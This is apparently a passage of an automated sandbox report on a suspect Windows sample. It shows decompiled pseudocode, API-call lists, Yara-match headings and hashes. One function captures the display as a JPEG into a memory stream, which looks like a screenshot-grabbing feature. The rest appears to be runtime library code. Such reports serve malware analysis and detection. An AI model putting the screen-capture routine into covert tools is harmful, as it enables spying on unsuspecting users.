                                                                                                							E00402F85(_t125, _t217 - 0x18, E00405416( &_v384,  &_v492, __eflags, 0x46e250), __eflags,  &_v480);
                                                                                                							_push(0x4d);
                                                                                                							E00404BB7(_t125, 0x46e9a8, _t88, __eflags);
                                                                                                						} else {
                                                                                                							E00404943(0x46e9a8);
                                                                                                							E004049DE(0x46e9a8, _t210, 0x46e9a8);
                                                                                                							E00404CD4(0x46e9a8, E00415968);
                                                                                                							_t98 = E00417D2B( &_v392, 0x46e990);
                                                                                                							_t191 =  *0x46dd64; // 0x0
                                                                                                							_t99 = E00417C16(0x46e250,  &_v184, _t191);
                                                                                                							E00402F0F(_t217 - 0x18, E00402F85(0x46e250,  &_v352, E00402F0F( &_v328, E00402F85(0x46e250,  &_v304, E00402F85(0x46e250,  &_v280, E00402F85(0x46e250,  &_v256, E00402F85(0x46e250,  &_v232, E00405416( &_v208,  &_v500, __eflags, 0x46e250), __eflags,  &_v488), __eflags, 0x46e250), __eflags, 0x46e960), __eflags, 0x46e250), _t99), __eflags, 0x46e250), _t98);
                                                                                                							_push(0x10);
                                                                                                							E00404BB7(0x46e250, 0x46e9a8, _t107, __eflags);
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                						}
                                                                                                						E00401FB9();
                                                                                                					} else {
                                                                                                						E00404F18(0x46e9a8,  &_v300);
                                                                                                					}
                                                                                                					E00414E3F(E00401FB9(),  &_v452);
                                                                                                				} else {
                                                                                                					if( *0x46dd5e != 1) {
                                                                                                						__eflags =  *0x46e9ac - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00404943(0x46e9a8);
                                                                                                							E004049DE(0x46e9a8, _t207, 0x46e9a8);
                                                                                                						}
                                                                                                						E004020DE(_t124, _t216 - 0x18, _t186, __eflags, 0x46e960);
                                                                                                						_push(0x4e);
                                                                                                						E00404BB7(_t124, 0x46e9a8, _t186, __eflags);
                                                                                                					} else {
                                                                                                						E00404F18(0x46e9a8, __edx);
                                                                                                					}
                                                                                                				}
                                                                                                				return E00401FB9();
                                                                                                			}

                                                                                                APIs
                                                                                                  • Part of subcall function 004152EA: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415305
                                                                                                  • Part of subcall function 004152EA: CreateCompatibleDC.GDI32(00000000), ref: 00415311
                                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00415037
                                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 0041508D
                                                                                                  • Part of subcall function 00404F18: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                  • Part of subcall function 00404F18: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                  • Part of subcall function 00404F18: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$Stream$CloseCompatibleEventHandleObjectSingleWait
                                                                                                • String ID: PF$image/jpeg
                                                                                                • API String ID: 609049557-165020994
                                                                                                • Opcode ID: e8dd95c5ae1285c96231e2f8295b617294261ce452ef78c50fa8684e79f70a0c
                                                                                                • Instruction ID: 540e87dd440121bbce44d66de5f7686fe6c773e4f572a5cc401b4b7bb25f6531
                                                                                                • Opcode Fuzzy Hash: e8dd95c5ae1285c96231e2f8295b617294261ce452ef78c50fa8684e79f70a0c
                                                                                                • Instruction Fuzzy Hash: EC81A0716082419BC324FB61D885AEFB3A8AFC5308F10452FF545A61D1EFB899498B4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E00447BB9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                				intOrPtr _v0;
                                                                                                				char _v6;
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr* _v64;
                                                                                                				intOrPtr _v96;
                                                                                                				intOrPtr* _v100;
                                                                                                				CHAR* _v104;
                                                                                                				signed int _v116;
                                                                                                				char _v290;
                                                                                                				signed int _v291;
                                                                                                				struct _WIN32_FIND_DATAA _v336;
                                                                                                				union _FINDEX_INFO_LEVELS _v340;
                                                                                                				signed int _v344;
                                                                                                				signed int _v348;
                                                                                                				intOrPtr _v440;
                                                                                                				intOrPtr* _t80;
                                                                                                				signed int _t82;
                                                                                                				signed int _t87;
                                                                                                				signed int _t91;
                                                                                                				signed int _t93;
                                                                                                				signed int _t95;
                                                                                                				signed int _t96;
                                                                                                				signed int _t100;
                                                                                                				signed int _t103;
                                                                                                				signed int _t108;
                                                                                                				signed int _t111;
                                                                                                				intOrPtr _t113;
                                                                                                				signed char _t115;
                                                                                                				union _FINDEX_INFO_LEVELS _t123;
                                                                                                				signed int _t128;
                                                                                                				signed int _t131;
                                                                                                				void* _t137;
                                                                                                				void* _t139;
                                                                                                				signed int _t140;
                                                                                                				signed int _t143;
                                                                                                				signed int _t145;
                                                                                                				signed int _t147;
                                                                                                				signed int* _t148;
                                                                                                				signed int _t151;
                                                                                                				void* _t154;
                                                                                                				CHAR* _t155;
                                                                                                				char _t158;
                                                                                                				char _t160;
                                                                                                				intOrPtr* _t163;
                                                                                                				void* _t164;
                                                                                                				intOrPtr* _t165;
                                                                                                				signed int _t167;
                                                                                                				void* _t169;
                                                                                                				intOrPtr* _t170;
                                                                                                				signed int _t174;
                                                                                                				signed int _t178;
                                                                                                				signed int _t179;
                                                                                                				intOrPtr* _t184;
                                                                                                				void* _t193;
                                                                                                				intOrPtr _t194;
                                                                                                				signed int _t196;
                                                                                                				signed int _t197;
                                                                                                				signed int _t199;
                                                                                                				signed int _t200;
                                                                                                				signed int _t202;
                                                                                                				union _FINDEX_INFO_LEVELS _t203;
                                                                                                				signed int _t208;
                                                                                                				signed int _t210;
                                                                                                				signed int _t211;
                                                                                                				void* _t213;
                                                                                                				intOrPtr _t214;
                                                                                                				void* _t215;
                                                                                                				signed int _t219;
                                                                                                				void* _t221;
                                                                                                				signed int _t222;
                                                                                                				void* _t223;
                                                                                                				void* _t224;
                                                                                                				void* _t225;
                                                                                                				signed int _t226;
                                                                                                				void* _t227;
                                                                                                				void* _t228;
                                                                                                
                                                                                                				_t80 = _a8;
                                                                                                				_t224 = _t223 - 0x20;
                                                                                                				if(_t80 != 0) {
                                                                                                					_t208 = _a4;
                                                                                                					_t160 = 0;
                                                                                                					 *_t80 = 0;
                                                                                                					_t199 = 0;
                                                                                                					_t151 = 0;
                                                                                                					_v36 = 0;
                                                                                                					_v336.cAlternateFileName = 0;
                                                                                                					_v28 = 0;
                                                                                                					__eflags =  *_t208;
                                                                                                					if( *_t208 == 0) {
                                                                                                						L9:
                                                                                                						_v12 = _v12 & 0x00000000;
                                                                                                						_t82 = _t151 - _t199;
                                                                                                						_v8 = _t160;
                                                                                                						_t191 = (_t82 >> 2) + 1;
                                                                                                						__eflags = _t151 - _t199;
                                                                                                						_v16 = (_t82 >> 2) + 1;
                                                                                                						asm("sbb esi, esi");
                                                                                                						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                                                                						__eflags = _t210;
                                                                                                						if(_t210 != 0) {
                                                                                                							_t197 = _t199;
                                                                                                							_t158 = _t160;
                                                                                                							do {
                                                                                                								_t184 =  *_t197;
                                                                                                								_t17 = _t184 + 1; // 0x1
                                                                                                								_v8 = _t17;
                                                                                                								do {
                                                                                                									_t143 =  *_t184;
                                                                                                									_t184 = _t184 + 1;
                                                                                                									__eflags = _t143;
                                                                                                								} while (_t143 != 0);
                                                                                                								_t158 = _t158 + 1 + _t184 - _v8;
                                                                                                								_t197 = _t197 + 4;
                                                                                                								_t145 = _v12 + 1;
                                                                                                								_v12 = _t145;
                                                                                                								__eflags = _t145 - _t210;
                                                                                                							} while (_t145 != _t210);
                                                                                                							_t191 = _v16;
                                                                                                							_v8 = _t158;
                                                                                                							_t151 = _v336.cAlternateFileName;
                                                                                                						}
                                                                                                						_t211 = E0043E203(_t191, _v8, 1);
                                                                                                						_t225 = _t224 + 0xc;
                                                                                                						__eflags = _t211;
                                                                                                						if(_t211 != 0) {
                                                                                                							_t87 = _t211 + _v16 * 4;
                                                                                                							_v20 = _t87;
                                                                                                							_t192 = _t87;
                                                                                                							_v16 = _t87;
                                                                                                							__eflags = _t199 - _t151;
                                                                                                							if(_t199 == _t151) {
                                                                                                								L23:
                                                                                                								_t200 = 0;
                                                                                                								__eflags = 0;
                                                                                                								 *_a8 = _t211;
                                                                                                								goto L24;
                                                                                                							} else {
                                                                                                								_t93 = _t211 - _t199;
                                                                                                								__eflags = _t93;
                                                                                                								_v24 = _t93;
                                                                                                								do {
                                                                                                									_t163 =  *_t199;
                                                                                                									_v12 = _t163 + 1;
                                                                                                									do {
                                                                                                										_t95 =  *_t163;
                                                                                                										_t163 = _t163 + 1;
                                                                                                										__eflags = _t95;
                                                                                                									} while (_t95 != 0);
                                                                                                									_t164 = _t163 - _v12;
                                                                                                									_t35 = _t164 + 1; // 0x1
                                                                                                									_t96 = _t35;
                                                                                                									_push(_t96);
                                                                                                									_v12 = _t96;
                                                                                                									_t100 = E00439D83(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                                                                									_t225 = _t225 + 0x10;
                                                                                                									__eflags = _t100;
                                                                                                									if(_t100 != 0) {
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										_push(0);
                                                                                                										E00437736();
                                                                                                										asm("int3");
                                                                                                										_t221 = _t225;
                                                                                                										_push(_t164);
                                                                                                										_t165 = _v64;
                                                                                                										_t47 = _t165 + 1; // 0x1
                                                                                                										_t193 = _t47;
                                                                                                										do {
                                                                                                											_t103 =  *_t165;
                                                                                                											_t165 = _t165 + 1;
                                                                                                											__eflags = _t103;
                                                                                                										} while (_t103 != 0);
                                                                                                										_push(_t199);
                                                                                                										_t202 = _a8;
                                                                                                										_t167 = _t165 - _t193 + 1;
                                                                                                										_v12 = _t167;
                                                                                                										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                                                                										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                                                                											_push(_t151);
                                                                                                											_t50 = _t202 + 1; // 0x1
                                                                                                											_t154 = _t50 + _t167;
                                                                                                											_t213 = E00440628(_t167, _t154, 1);
                                                                                                											_t169 = _t211;
                                                                                                											__eflags = _t202;
                                                                                                											if(_t202 == 0) {
                                                                                                												L34:
                                                                                                												_push(_v12);
                                                                                                												_t154 = _t154 - _t202;
                                                                                                												_t108 = E00439D83(_t169, _t213 + _t202, _t154, _v0);
                                                                                                												_t226 = _t225 + 0x10;
                                                                                                												__eflags = _t108;
                                                                                                												if(__eflags != 0) {
                                                                                                													goto L37;
                                                                                                												} else {
                                                                                                													_t137 = E00447F88(_a12, __eflags, _t213);
                                                                                                													E004414D5(0);
                                                                                                													_t139 = _t137;
                                                                                                													goto L36;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_push(_t202);
                                                                                                												_t140 = E00439D83(_t169, _t213, _t154, _a4);
                                                                                                												_t226 = _t225 + 0x10;
                                                                                                												__eflags = _t140;
                                                                                                												if(_t140 != 0) {
                                                                                                													L37:
                                                                                                													_push(0);
                                                                                                													_push(0);
                                                                                                													_push(0);
                                                                                                													_push(0);
                                                                                                													_push(0);
                                                                                                													E00437736();
                                                                                                													asm("int3");
                                                                                                													_push(_t221);
                                                                                                													_t222 = _t226;
                                                                                                													_t227 = _t226 - 0x150;
                                                                                                													_t111 =  *0x46c00c; // 0x4cc22724
                                                                                                													_v116 = _t111 ^ _t222;
                                                                                                													_t170 = _v100;
                                                                                                													_push(_t154);
                                                                                                													_t155 = _v104;
                                                                                                													_push(_t213);
                                                                                                													_t214 = _v96;
                                                                                                													_push(_t202);
                                                                                                													_v440 = _t214;
                                                                                                													while(1) {
                                                                                                														__eflags = _t170 - _t155;
                                                                                                														if(_t170 == _t155) {
                                                                                                															break;
                                                                                                														}
                                                                                                														_t113 =  *_t170;
                                                                                                														__eflags = _t113 - 0x2f;
                                                                                                														if(_t113 != 0x2f) {
                                                                                                															__eflags = _t113 - 0x5c;
                                                                                                															if(_t113 != 0x5c) {
                                                                                                																__eflags = _t113 - 0x3a;
                                                                                                																if(_t113 != 0x3a) {
                                                                                                																	_t170 = E00450760(_t155, _t170);
                                                                                                																	continue;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                														break;
                                                                                                													}
                                                                                                													_t194 =  *_t170;
                                                                                                													__eflags = _t194 - 0x3a;
                                                                                                													if(_t194 != 0x3a) {
                                                                                                														L47:
                                                                                                														_t203 = 0;
                                                                                                														__eflags = _t194 - 0x2f;
                                                                                                														if(_t194 == 0x2f) {
                                                                                                															L51:
                                                                                                															_t115 = 1;
                                                                                                															__eflags = 1;
                                                                                                														} else {
                                                                                                															__eflags = _t194 - 0x5c;
                                                                                                															if(_t194 == 0x5c) {
                                                                                                																goto L51;
                                                                                                															} else {
                                                                                                																__eflags = _t194 - 0x3a;
                                                                                                																if(_t194 == 0x3a) {
                                                                                                																	goto L51;
                                                                                                																} else {
                                                                                                																	_t115 = 0;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                														asm("sbb eax, eax");
                                                                                                														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                                                                														E00432D80(_t203,  &_v336, _t203, 0x140);
                                                                                                														_t228 = _t227 + 0xc;
                                                                                                														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                                                                														_t123 = _v340;
                                                                                                														__eflags = _t215 - 0xffffffff;
                                                                                                														if(_t215 != 0xffffffff) {
                                                                                                															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                                                                															__eflags = _t174;
                                                                                                															_v348 = _t174 >> 2;
                                                                                                															do {
                                                                                                																__eflags = _v336.cFileName - 0x2e;
                                                                                                																if(_v336.cFileName != 0x2e) {
                                                                                                																	L64:
                                                                                                																	_push(_t123);
                                                                                                																	_push(_v344);
                                                                                                																	_t123 =  &(_v336.cFileName);
                                                                                                																	_push(_t155);
                                                                                                																	_push(_t123);
                                                                                                																	L28();
                                                                                                																	_t228 = _t228 + 0x10;
                                                                                                																	__eflags = _t123;
                                                                                                																	if(_t123 != 0) {
                                                                                                																		goto L54;
                                                                                                																	} else {
                                                                                                																		goto L65;
                                                                                                																	}
                                                                                                																} else {
                                                                                                																	_t178 = _v291;
                                                                                                																	__eflags = _t178;
                                                                                                																	if(_t178 == 0) {
                                                                                                																		goto L65;
                                                                                                																	} else {
                                                                                                																		__eflags = _t178 - 0x2e;
                                                                                                																		if(_t178 != 0x2e) {
                                                                                                																			goto L64;
                                                                                                																		} else {
                                                                                                																			__eflags = _v290;
                                                                                                																			if(_v290 == 0) {
                                                                                                																				goto L65;
                                                                                                																			} else {
                                                                                                																				goto L64;
                                                                                                																			}
                                                                                                																		}
                                                                                                																	}
                                                                                                																}
                                                                                                																goto L58;
                                                                                                																L65:
                                                                                                																_t128 = FindNextFileA(_t215,  &_v336);
                                                                                                																__eflags = _t128;
                                                                                                																_t123 = _v340;
                                                                                                															} while (_t128 != 0);
                                                                                                															_t195 =  *_t123;
                                                                                                															_t179 = _v348;
                                                                                                															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                                                                															__eflags = _t179 - _t131;
                                                                                                															if(_t179 != _t131) {
                                                                                                																E00439350(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00447BA1);
                                                                                                															}
                                                                                                														} else {
                                                                                                															_push(_t123);
                                                                                                															_push(_t203);
                                                                                                															_push(_t203);
                                                                                                															_push(_t155);
                                                                                                															L28();
                                                                                                															L54:
                                                                                                															_t203 = _t123;
                                                                                                														}
                                                                                                														__eflags = _t215 - 0xffffffff;
                                                                                                														if(_t215 != 0xffffffff) {
                                                                                                															FindClose(_t215);
                                                                                                														}
                                                                                                													} else {
                                                                                                														__eflags = _t170 -  &(_t155[1]);
                                                                                                														if(_t170 ==  &(_t155[1])) {
                                                                                                															goto L47;
                                                                                                														} else {
                                                                                                															_push(_t214);
                                                                                                															_push(0);
                                                                                                															_push(0);
                                                                                                															_push(_t155);
                                                                                                															L28();
                                                                                                														}
                                                                                                													}
                                                                                                													L58:
                                                                                                													__eflags = _v16 ^ _t222;
                                                                                                													return E00430A5B(_v16 ^ _t222);
                                                                                                												} else {
                                                                                                													goto L34;
                                                                                                												}
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t139 = 0xc;
                                                                                                											L36:
                                                                                                											return _t139;
                                                                                                										}
                                                                                                									} else {
                                                                                                										goto L22;
                                                                                                									}
                                                                                                									goto L68;
                                                                                                									L22:
                                                                                                									_t196 = _v16;
                                                                                                									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                                                                									_t199 = _t199 + 4;
                                                                                                									_t192 = _t196 + _v12;
                                                                                                									_v16 = _t196 + _v12;
                                                                                                									__eflags = _t199 - _t151;
                                                                                                								} while (_t199 != _t151);
                                                                                                								goto L23;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t200 = _t199 | 0xffffffff;
                                                                                                							L24:
                                                                                                							E004414D5(0);
                                                                                                							goto L25;
                                                                                                						}
                                                                                                					} else {
                                                                                                						while(1) {
                                                                                                							_v8 = 0x3f2a;
                                                                                                							_v6 = _t160;
                                                                                                							_t147 = E00450720( *_t208,  &_v8);
                                                                                                							__eflags = _t147;
                                                                                                							if(_t147 != 0) {
                                                                                                								_push( &_v36);
                                                                                                								_push(_t147);
                                                                                                								_push( *_t208);
                                                                                                								L38();
                                                                                                								_t224 = _t224 + 0xc;
                                                                                                							} else {
                                                                                                								_t147 =  &_v36;
                                                                                                								_push(_t147);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push( *_t208);
                                                                                                								L28();
                                                                                                								_t224 = _t224 + 0x10;
                                                                                                							}
                                                                                                							_t200 = _t147;
                                                                                                							__eflags = _t200;
                                                                                                							if(_t200 != 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t208 = _t208 + 4;
                                                                                                							_t160 = 0;
                                                                                                							__eflags =  *_t208;
                                                                                                							if( *_t208 != 0) {
                                                                                                								continue;
                                                                                                							} else {
                                                                                                								_t151 = _v336.cAlternateFileName;
                                                                                                								_t199 = _v36;
                                                                                                								goto L9;
                                                                                                							}
                                                                                                							goto L68;
                                                                                                						}
                                                                                                						L25:
                                                                                                						E00447F63( &_v36);
                                                                                                						_t91 = _t200;
                                                                                                						goto L26;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t148 = E00438932();
                                                                                                					_t219 = 0x16;
                                                                                                					 *_t148 = _t219;
                                                                                                					E00437709();
                                                                                                					_t91 = _t219;
                                                                                                					L26:
                                                                                                					return _t91;
                                                                                                				}
                                                                                                				L68:
                                                                                                			}





















































































                                                                                                0x00447ef4
                                                                                                0x00447ef4
                                                                                                0x00447efb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447efb
                                                                                                0x00447ef2
                                                                                                0x00447eed
                                                                                                0x00000000
                                                                                                0x00447f18
                                                                                                0x00447f20
                                                                                                0x00447f26
                                                                                                0x00447f28
                                                                                                0x00447f28
                                                                                                0x00447f30
                                                                                                0x00447f35
                                                                                                0x00447f3d
                                                                                                0x00447f40
                                                                                                0x00447f42
                                                                                                0x00447f56
                                                                                                0x00447f5b
                                                                                                0x00447ea1
                                                                                                0x00447ea1
                                                                                                0x00447ea2
                                                                                                0x00447ea3
                                                                                                0x00447ea4
                                                                                                0x00447ea5
                                                                                                0x00447ead
                                                                                                0x00447ead
                                                                                                0x00447ead
                                                                                                0x00447eaf
                                                                                                0x00447eb2
                                                                                                0x00447eb5
                                                                                                0x00447eb5
                                                                                                0x00447e2c
                                                                                                0x00447e2f
                                                                                                0x00447e31
                                                                                                0x00000000
                                                                                                0x00447e33
                                                                                                0x00447e33
                                                                                                0x00447e36
                                                                                                0x00447e37
                                                                                                0x00447e38
                                                                                                0x00447e39
                                                                                                0x00447e3e
                                                                                                0x00447e31
                                                                                                0x00447ebd
                                                                                                0x00447ec2
                                                                                                0x00447ecd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447d9b
                                                                                                0x00447d6f
                                                                                                0x00447d71
                                                                                                0x00447dcd
                                                                                                0x00447dd1
                                                                                                0x00447dd1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447d06
                                                                                                0x00447d09
                                                                                                0x00447d0c
                                                                                                0x00447d0f
                                                                                                0x00447d12
                                                                                                0x00447d15
                                                                                                0x00447d18
                                                                                                0x00447d18
                                                                                                0x00000000
                                                                                                0x00447cd5
                                                                                                0x00447cb7
                                                                                                0x00447cb7
                                                                                                0x00447d23
                                                                                                0x00447d25
                                                                                                0x00000000
                                                                                                0x00447d2a
                                                                                                0x00447bf9
                                                                                                0x00447bf9
                                                                                                0x00447bfc
                                                                                                0x00447c05
                                                                                                0x00447c08
                                                                                                0x00447c0f
                                                                                                0x00447c11
                                                                                                0x00447c2a
                                                                                                0x00447c2b
                                                                                                0x00447c2c
                                                                                                0x00447c2e
                                                                                                0x00447c33
                                                                                                0x00447c13
                                                                                                0x00447c13
                                                                                                0x00447c16
                                                                                                0x00447c17
                                                                                                0x00447c19
                                                                                                0x00447c1b
                                                                                                0x00447c1d
                                                                                                0x00447c22
                                                                                                0x00447c22
                                                                                                0x00447c36
                                                                                                0x00447c38
                                                                                                0x00447c3a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447c40
                                                                                                0x00447c43
                                                                                                0x00447c45
                                                                                                0x00447c47
                                                                                                0x00000000
                                                                                                0x00447c49
                                                                                                0x00447c49
                                                                                                0x00447c4c
                                                                                                0x00000000
                                                                                                0x00447c4c
                                                                                                0x00000000
                                                                                                0x00447c47
                                                                                                0x00447d2b
                                                                                                0x00447d2e
                                                                                                0x00447d33
                                                                                                0x00000000
                                                                                                0x00447d36
                                                                                                0x00447bc9
                                                                                                0x00447bc9
                                                                                                0x00447bd0
                                                                                                0x00447bd1
                                                                                                0x00447bd3
                                                                                                0x00447bd8
                                                                                                0x00447d37
                                                                                                0x00447d3b
                                                                                                0x00447d3b
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • _strpbrk.LIBCMT ref: 00447C08
                                                                                                • _free.LIBCMT ref: 00447D25
                                                                                                  • Part of subcall function 00437736: IsProcessorFeaturePresent.KERNEL32(00000017,00437708,00430D59,?,?,?,?,00000016,?,?,00437715,00000000,00000000,00000000,00000000,00000000), ref: 00437738
                                                                                                  • Part of subcall function 00437736: GetCurrentProcess.KERNEL32(C0000417,?,00430D59), ref: 0043775A
                                                                                                  • Part of subcall function 00437736: TerminateProcess.KERNEL32(00000000,?,00430D59), ref: 00437761
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                • String ID: *?$.
                                                                                                • API String ID: 2812119850-3972193922
                                                                                                • Opcode ID: a128ad8f31457049470a01bc4d3ca20c41a783d88a79eea938201ac5d679e1f9
                                                                                                • Instruction ID: 7fddc97a4e99cde9de0716c07f2153075e4cfbd40f52074104c008bc74e6faba
                                                                                                • Opcode Fuzzy Hash: a128ad8f31457049470a01bc4d3ca20c41a783d88a79eea938201ac5d679e1f9
                                                                                                • Instruction Fuzzy Hash: AC51B471D0410AAFEF14CFA9C881AAEB7B5EF48314F24816EE454E7341E7799E028B54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 73%
                                                                                                			E00440150(void* __ebx, void* __ecx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				void* _v20;
                                                                                                				signed int _t21;
                                                                                                				void* _t23;
                                                                                                				signed int _t27;
                                                                                                				signed int _t31;
                                                                                                				intOrPtr* _t35;
                                                                                                				intOrPtr* _t46;
                                                                                                				void* _t56;
                                                                                                				void* _t62;
                                                                                                				signed short* _t64;
                                                                                                				intOrPtr _t66;
                                                                                                				intOrPtr* _t68;
                                                                                                				intOrPtr _t70;
                                                                                                				signed int _t71;
                                                                                                				void* _t72;
                                                                                                				intOrPtr* _t74;
                                                                                                
                                                                                                				_t53 = __ebx;
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t21 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t21 ^ _t71;
                                                                                                				_t64 = _a4;
                                                                                                				if(_t64 != 0) {
                                                                                                					_t23 = E00442A3F(__ebx, __ecx, _t64, _a8);
                                                                                                					_pop(_t56);
                                                                                                					if(_t23 < _a8) {
                                                                                                						_t68 = 0;
                                                                                                						_t26 =  *((intOrPtr*)( *_a12 + 0xa8));
                                                                                                						if( *((intOrPtr*)( *_a12 + 0xa8)) == 0) {
                                                                                                							while( *_t64 != _t68) {
                                                                                                								_t27 =  *_t64 & 0x0000ffff;
                                                                                                								if(_t27 >= 0x41 && _t27 <= 0x5a) {
                                                                                                									 *_t64 = _t27 + 0x20;
                                                                                                								}
                                                                                                								_t64 =  &(_t64[1]);
                                                                                                							}
                                                                                                							L29:
                                                                                                							return E00430A5B(_v8 ^ _t71);
                                                                                                						}
                                                                                                						_t31 = E0044C20B(__ebx, _t56, _t26, 0x100, _t64, 0xffffffff, 0, 0);
                                                                                                						_t74 = _t72 + 0x18;
                                                                                                						_v12 = _t31;
                                                                                                						if(_t31 != 0) {
                                                                                                							if(_a8 >= _t31) {
                                                                                                								_t62 = _t31 + _t31;
                                                                                                								_t59 = _t62 + 8;
                                                                                                								asm("sbb eax, eax");
                                                                                                								if((_t62 + 0x00000008 & _t31) == 0) {
                                                                                                									L23:
                                                                                                									if(_t68 != 0) {
                                                                                                										if(E0044C20B(_t53, _t59,  *((intOrPtr*)( *_a12 + 0xa8)), 0x100, _t64, 0xffffffff, _t68, _v12) == 0) {
                                                                                                											_t35 = E00438932();
                                                                                                											_t66 = 0x2a;
                                                                                                											 *_t35 = _t66;
                                                                                                										} else {
                                                                                                											_t66 = E004428B4(_t64, _a8, _t68);
                                                                                                										}
                                                                                                										L28:
                                                                                                										E004318FD(_t68);
                                                                                                										goto L29;
                                                                                                									}
                                                                                                									L24:
                                                                                                									 *((intOrPtr*)(E00438932())) = 0xc;
                                                                                                									_t66 =  *((intOrPtr*)(E00438932()));
                                                                                                									goto L28;
                                                                                                								}
                                                                                                								asm("sbb eax, eax");
                                                                                                								_t41 = _t31 & _t62 + 0x00000008;
                                                                                                								_t59 = _t62 + 8;
                                                                                                								if((_t31 & _t62 + 0x00000008) > 0x400) {
                                                                                                									asm("sbb eax, eax");
                                                                                                									_t68 = E00440C6C(_t59, _t41 & _t59);
                                                                                                									_pop(_t59);
                                                                                                									if(_t68 == 0) {
                                                                                                										goto L24;
                                                                                                									}
                                                                                                									 *_t68 = 0xdddd;
                                                                                                									L22:
                                                                                                									_t68 = _t68 + 8;
                                                                                                									goto L23;
                                                                                                								}
                                                                                                								asm("sbb eax, eax");
                                                                                                								E004519B0();
                                                                                                								_t68 = _t74;
                                                                                                								if(_t68 == 0) {
                                                                                                									goto L24;
                                                                                                								}
                                                                                                								 *_t68 = 0xcccc;
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							 *_t64 = 0;
                                                                                                							_t46 = E00438932();
                                                                                                							_push(0x22);
                                                                                                							L2:
                                                                                                							_pop(_t70);
                                                                                                							 *_t46 = _t70;
                                                                                                							E00437709();
                                                                                                							goto L29;
                                                                                                						}
                                                                                                						 *((intOrPtr*)(E00438932())) = 0x2a;
                                                                                                						E00438932();
                                                                                                						goto L29;
                                                                                                					}
                                                                                                					 *_t64 = 0;
                                                                                                				}
                                                                                                				_t46 = E00438932();
                                                                                                				_push(0x16);
                                                                                                				goto L2;
                                                                                                			}






















                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
